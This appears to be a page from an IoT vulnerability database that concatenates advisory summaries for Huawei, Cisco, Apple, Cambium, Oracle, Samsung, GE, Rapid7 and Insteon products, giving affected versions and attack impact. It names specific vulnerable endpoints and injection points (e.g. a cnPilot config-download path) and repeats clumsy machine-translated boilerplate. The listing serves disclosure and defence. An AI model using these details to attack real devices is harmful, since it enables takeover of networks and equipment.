VARIoT IoT vulnerabilities database

Huawei P9 smartphones with software versions earlier before EVA-AL10C00B365, versions earlier before EVA-AL00C00B365, versions earlier before EVA-CL00C92B365, versions earlier before EVA-DL00C17B365, versions earlier before EVA-TL00C01B365 have a phone activation bypass vulnerability. Successful exploit could allow an unauthenticated attacker to bypass phone activation to settings page of the phone. Huawei P9 Smartphone software contains a vulnerability related to access control.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiP9 is a smartphone product from China's Huawei company. HuaweiP9 has a mobile activation bypass vulnerability. Huawei Smart Phones are prone to a security-bypass vulnerability. An attacker may exploit this issue to bypass certain security restrictions and cause denial-of-service conditions. There is a security flaw in the Huawei P9

The ddr_devfreq driver in versions earlier than GRA-UL00C00B197 has buffer overflow vulnerability. An attacker with the root privilege of the Android system can tricks a user into installing a malicious application on the smart phone, and send given parameter to smart phone to crash the system or escalate privilege. P8 The software contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HuaweiMate8 and P9 are China's Huawei smartphone products. Huawei Smart Phones is prone to a local buffer-overflow vulnerability. An attacker can exploit this issue to crash the affected application; denying service to legitimate or execute arbitrary code. Versions of Huawei Smart Phones 5.41 and prior are vulnerable. The ddr_devfreq driver is one of the ddr operating frequency adjustment drivers

A vulnerability in Intermediate System-to-Intermediate System (IS-IS) protocol packet processing of Cisco Nexus 5000, 6000, and 7000 Series Switches software could allow an unauthenticated, adjacent attacker to cause a reload of the affected device. Switches in the FabricPath domain crash because of an __inst_001__isis_fabricpath hap reset when processing a crafted link-state packet. More Information: CSCvc45002. Known Affected Releases: 7.1(3)N1(2.1) 7.1(3)N1(3.12) 7.3(2)N1(0.296) 8.0(1)S2. Known Fixed Releases: 6.2(18)S11 7.0(3)I5(1.170) 7.0(3)I5(2) 7.1(4)N1(0.4) 7.1(4)N1(1b) 7.1(5)N1(0.986) 7.1(5)N1(1) 7.2(3)D1(0.8) 7.3(2)N1(0.304) 7.3(2)N1(1) 8.0(0.96)S0 8.0(1) 8.0(1)E1 8.0(1)S4 8.3(0)CV(0.788). Vendors have confirmed this vulnerability Bug ID CSCvc45002 It is released as.An attacker could reload the device. The Cisco Nexus 7000 Series Switches help create the network infrastructure needed for next-generation unified array data centers. A denial of service vulnerability exists in multiple Cisco Nexus devices. This issue is being tracked by Cisco bug ID CSCvc45002. Cisco Nexus 5000, 6000 and 7000 Series Switches are all switch products of Cisco (Cisco)

A vulnerability in the web-based management interface of Cisco IOS and Cisco IOx Software could allow an unauthenticated, remote attacker to view confidential information that is displayed without authenticating to the device. Affected Products: This vulnerability affects Cisco IOS Software and Cisco IOx Software running on IR829, IR809, IE4K, and CGR1K platforms. More Information: CSCvb20897. Known Affected Releases: 1.0(0). An attacker can exploit this issue to obtain sensitive information that may aid in further attacks. This issue is being tracked by Cisco bug ID CSCvb20897. web-based management interface is one of the web-based management interfaces

An issue was discovered in certain Apple products. GarageBand before 10.1.5 is affected. Logic Pro X before 10.3 is affected. The issue involves the "Projects" component, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted GarageBand project file. Apple From GarageBand and Logic Pro X An update for has been released.Crafted GarageBand An arbitrary code may be executed by opening the project file. Attackers can exploit this issue to execute arbitrary code on the affected system. Failed exploit attempts may result in a denial-of-service condition. CVE-2017-2372: Tyler Bohan of Cisco Talos Installation note: GarageBand 10.1.5 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJYf8YgAAoJEIOj74w0bLRGWiQP+gNnna3Ha0pOdJr/u3LHf/tN tpX/lArjvo8ELpqb8wc5iCDXmSq7BgrnOV2T+XNI0XtE1md0xkQ3ttfTmSWB33Nh ylVaHytLC/Xy5JqOYjuD9NWwo9wBdT+/6m1jMymUvaSs+QS3wNn64v0gp75zGKBh UW9LJHDAAzfWui2rL2Rw3Iyuk2tGAO7QmEdTjfKZ7p+wcWjz3A61LYorVVxlZOO+ d6ir0mleQudZWB55hidm0z5d3x5GWhQ9jWWgI6fdD8DvEXrQfE60bnQZEMQzplgk bGE9ZPASl41Y3rzfLb8M5c7Rfth2sWijOOTDfGiIzaXBH293S6iyfzwONnoL9eTH WeR8Em4Dbp5YpMoMoEPUR+Bx2pOgZWAPbbErn4uvP8quC1DcKQ/WzObOb/m5XfE6 /jUvV6dI1f/jNutt9uzs/y54qzoQxJDQXm6lqWo0PvlMbEOiSWUlH0ierwMpxAaG dw1EjizczK9JoLseNc8YTAYyjEvhx7BMZuRiZjmHuHzfSaTvD4Gl/8w+KTEmsIkf V0R1F6IK6gFxRphHvfY2SkDVvgYk0eHCSXq9pkPDShElJR38Iu+a4vvXOjSGkOHL h2mAUdnNalF9zyyVX2oCfgHnxtuI8dvNQDHQjYS+xmcd00VmJm63WFgT72fOzVvP n5gdgHkBKUmF+lzYVHtj =4J27 -----END PGP SIGNATURE-----

An issue was discovered on Phoenix Contact mGuard devices that have been updated to Version 8.4.0. When updating an mGuard device to Version 8.4.0 via the update-upload facility, the update will succeed, but it will reset the password of the admin user to its default value. Phoenix Contact mGuard is a security device for unauthorized access and installation of Phoenix Contact's protection system. Phoenix Contact mGuard has a security bypass vulnerability. The attacker exploited the vulnerability to bypass the security restrictions and perform unauthorized operations to launch further attacks. This may aid in further attacks

In version 3.5 and prior of Cambium Networks ePMP firmware, the non-administrative users 'installer' and 'home' have the capability of changing passwords for other accounts, including admin, after disabling a client-side protection mechanism. Cambium Networks ePMP Vulnerabilities related to authorization, permissions and access control exist in the firmware.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CambiumNetworksePMP is a wireless network access platform of Cambium Networks Inc. The platform provides features such as video surveillance, Wi-Fi hotspots and sensor connectivity. A security vulnerability exists in CambiumNetworksePMP using firmware versions 3.5 and earlier. This vulnerability stems from the fact that the installer and home accounts can change the passwords of other accounts. An attacker could exploit the vulnerability to bypass password changes in other accounts by bypassing the client protection mechanism

In version 3.5 and prior of Cambium Networks ePMP firmware, a lack of input sanitation for certain parameters on the web management console allows any authenticated user (including the otherwise low-privilege readonly user) to inject shell meta-characters as part of a specially-crafted POST request to the get_chart function and run OS-level commands, effectively as root. Cambium Networks ePMP Has a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CambiumNetworksePMP is a wireless network access platform of Cambium Networks Inc. The platform provides features such as video surveillance, Wi-Fi hotspots and sensor connectivity. A security vulnerability exists in CambiumNetworksePMP using firmware versions 3.5 and earlier, which stems from a failure of the web management console to adequately filter input. An attacker can use this vulnerability to inject shell metacharacters by sending a specially crafted POST request to the \342\200\230get_chart\342\200\231 function to gain access to the administrator, control the device, and the entire WiFi network

In version 3.5 and prior of Cambium Networks ePMP firmware, all authenticated users have the ability to update the Device Name and System Description fields in the web administration console, and those fields are vulnerable to persistent cross-site scripting (XSS) injection. Cambium Networks ePMP Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. CambiumNetworksePMP is a wireless network access platform of Cambium Networks Inc. The platform provides features such as video surveillance, Wi-Fi hotspots and sensor connectivity. Webadministrationconsole is one of the management console programs. A cross-site scripting vulnerability exists in the DeviceName and SystemDescription fields of Webadministrationconsole in CambiumNetworksePMP with 3.5 and earlier firmware. A remote attacker can exploit this vulnerability to gain access to a user's browser session, control devices, and the entire WiFi network

In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows (or guesses) the SNMP read/write (RW) community string can insert XSS strings in certain SNMP OIDs which will execute in the context of the currently-logged on user. Cambium Networks ePMP Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. CambiumNetworksePMP is a wireless network access platform of Cambium Networks Inc. The platform provides features such as video surveillance, Wi-Fi hotspots and sensor connectivity. A cross-site scripting vulnerability exists in CambiumNetworksePMP with firmware versions 3.5 and earlier, which resulted from the program failing to filter user-submitted input. An attacker could exploit the vulnerability to gain access to a user's browser session, control the device, and the entire WiFi network. Cambium Networks ePMP with firmware version 3.5 and earlier has a security vulnerability

In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows or can guess the RW community string can provide a URL for a configuration file over SNMP with XSS strings in certain SNMP OIDs, serve it via HTTP, and the affected device will perform a configuration restore using the attacker's supplied config file, including the inserted XSS strings. Cambium Networks ePMP Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. CambiumNetworksePMP is a wireless network access platform of Cambium Networks Inc. The platform provides features such as video surveillance, Wi-Fi hotspots and sensor connectivity. A cross-site scripting vulnerability exists in CambiumNetworksePMP with 3.5 and prior firmware. An attacker could exploit the vulnerability to gain access to a user's browser session, control the device, and the entire WiFi network

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, although the option to access the configuration file is not available in the normal web administrative console for the 'user' account, the configuration file is accessible via direct object reference (DRO) at http://<device-ip-or-hostname>/goform/down_cfg_file by this otherwise low privilege 'user' account. Cambium Networks cnPilot Vulnerabilities related to environment settings exist in the firmware.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CambiumNetworkscnPilot is a cloud-managed single-frequency router product from Cambium Networks Inc. There is a security vulnerability in CambiumNetworkscnPilot using 4.3.2-R4 and previous firmware. An attacker can use this vulnerability to gain access to the administrator's password with direct object references, which in turn controls the device and the entire WiFi network

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the 'ping' and 'traceroute' functions of the web administrative console expose a file path traversal vulnerability, accessible to all authenticated users. Cambium Networks cnPilot Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CambiumNetworkscnPilot is a cloud-managed single-frequency router product from Cambium Networks Inc. Webadministrativeconsole is one of the web management console programs. A path traversal vulnerability exists in the \342\200\230ping\342\200\231 and \342\200\230traceroute\342\200\231 functions of Webadministrativeconsole in CambiumNetworkscnPilot using 4.3.2-R4 and previous firmware. The vulnerability stems from the program failing to filter user-submitted input. An attacker could exploit the vulnerability to gain access to an administrator password to control the entire WiFi network of the device

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the SNMP read-only (RO) community string has access to sensitive information by OID reference. Cambium Networks cnPilot Contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CambiumNetworkscnPilot is a cloud-managed single-frequency router product from Cambium Networks Inc. There is a security vulnerability in CambiumNetworkscnPilot using 4.3.2-R4 and previous firmware. An attacker could exploit the vulnerability by referring to an object identifier to obtain sensitive information (username and password)

Versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware lack CSRF controls that can mitigate the effects of CSRF attacks, which are most typically implemented as randomized per-session tokens associated with any web application function, especially destructive ones. Cambium Networks cnPilot Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CambiumNetworkscnPilot is a cloud-managed single-frequency router product from Cambium Networks Inc. A security vulnerability exists in CambiumNetworkscnPilot using 4.3.2-R4 and previous firmware, which stems from the lack of cross-site request forgery control. An attacker could use this vulnerability to gain or change an administrator password to control the device and the entire WiFi network

Vulnerability in the Oracle XML Gateway component of Oracle E-Business Suite (subcomponent: Oracle Transport Agent). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle XML Gateway. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle XML Gateway, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle XML Gateway accessible data as well as unauthorized update, insert or delete access to some of Oracle XML Gateway accessible data. CVSS v3.0 Base Score 8.2 (Confidentiality and Integrity impacts). The vulnerability can be exploited over the 'HTTP' protocol. The software provides functions such as customer relationship management, service management, and financial management

Samsung Smartcam is Samsung's smart webcam. There is a remote command execution vulnerability in SamsungSmartcam. Because the iWatch firmware upgrade file name is not properly cleared, the remote attacker exploits the vulnerability by constructing a special request injection command to obtain the device root access permission remote execution command.

An issue was discovered in General Electric (GE) Proficy HMI/SCADA iFIX Version 5.8 SIM 13 and prior versions, Proficy HMI/SCADA CIMPLICITY Version 9.0 and prior versions, and Proficy Historian Version 6.0 and prior versions. An attacker may be able to retrieve user passwords if he or she has access to an authenticated session. GE Proficy HMI/SCADA-CIMPLICITY is a client/server based HMI/SCADA solution from General Electric (GE). The solution captures and shares real-time and historical data across all levels of the enterprise, enabling visualization of processes, equipment, and resource monitoring operations. Proficy Historian is a factory system that collects, archives and distributes a large amount of real-time data at high speed, which significantly improves operational visibility and profit and loss settlement lines. Local vulnerabilities can exploit this vulnerability to obtain sensitive information. Multiple GE products are prone to a local information-disclosure vulnerability

The default SSH configuration in Rapid7 Nexpose hardware appliances shipped before June 2017 does not specify desired algorithms for key exchange and other important functions. As a result, it falls back to allowing ALL algorithms supported by the relevant version of OpenSSH and makes the installations vulnerable to a range of MITM, downgrade, and decryption attacks. Rapid7 Nexpose Contains a vulnerability in the use of cryptographic algorithms.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Rapid7Nexposehardwareappliances is a hardware device with Nexpose from Rapid7 in the United States. Nexpose is a vulnerability management software that can comprehensively utilize different scan results for deep probing networks. A man-in-the-middle attack vulnerability exists in the default SSH configuration in the Rapid7Nexpose hardware device. An attacker can exploit this vulnerability to perform man-in-the-middle attacks, downgrade attacks, and decryption attacks

In version 1012 and prior of Insteon's Insteon Hub, the radio transmissions used for communication between the hub and connected devices are not encrypted. Insteon Hub Contains a cryptographic vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. INSTEON Hub is an INSTEON central controller product of the American INSTEON company. This product can remotely control light bulbs, wall switches, air conditioners, etc. in your home. An attacker could exploit this vulnerability to bypass authentication